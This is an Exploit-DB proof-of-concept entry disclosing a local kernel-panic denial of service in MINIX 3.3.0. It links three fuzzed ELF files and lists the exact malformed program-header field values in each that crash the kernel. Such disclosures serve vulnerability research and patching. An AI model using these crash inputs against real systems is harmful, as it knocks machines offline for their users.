Minix 3.3.0 - Local Denial of Service (PoC)

EDB-ID:

35173

CVE:


Author:

nitr0us

Type:

dos

Platform:

Linux

Published:

2014-11-06

# Exploit Title: MINIX 3.3.0 Local Denial of Service
# Exploit Author: nitr0us
# Vendor Homepage: www.minix3.org
# Software Link: http://www.minix3.org/download/index.html
# Version: 3.3.0
# Tested on: MINIX 3.3.0 x86

Attached three PoCs (malformed ELFs) and a screenshot of the panic.

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35173.zip

----

MINIX 3.3.0 is prone to local kernel panic due to malformed program headers in an ELF executable.
Attached three PoCs that panicked the OS, and their modified fields:

=================================================================================

[+] Malformed ELF: 'orc_0064':


[+] Fuzzing the Program Header Table with 4 entries
(PHT[0]->p_vaddr = 0x08056919, p_paddr = 0xcafed00d) | PHT[0] rule [03]
executed
(PHT[0]->p_flags = 0xf0000005) | PHT[0] rule [10] executed
(PHT[0]->p_flags = 0xfff00005) | PHT[0] rule [15] executed
(PHT[3]->p_type = 0x0) | PHT[3] rule [01] executed
(PHT[3]->p_vaddr = 0x1905af52, p_paddr = 0x1905af52) | PHT[3] rule [03]
executed
(PHT[3]->p_type = 0x70031337) | PHT[3] rule [06] executed
(PHT[PT_LOAD].p_vaddr reordered [descending]) | PHT rule [20] executed

=================================================================================

[+] Malformed ELF: 'orc_0090':


[+] Fuzzing the Program Header Table with 4 entries
(PHT[0]->p_offset = 0xffff0000) | PHT[0] rule [02] executed
(PHT[3]->p_type = 0x7defaced) | PHT[3] rule [06] executed

=================================================================================

[+] Malformed ELF: 'orc_0092':


[+] Fuzzing the Program Header Table with 4 entries
(PHT[0]->p_filesz = 0x0004fdec, p_memsz = 0x41424344) | PHT[0] rule [04]
executed
(PHT[3]->p_type = 0x6fffffff) | PHT[3] rule [14]

=================================================================================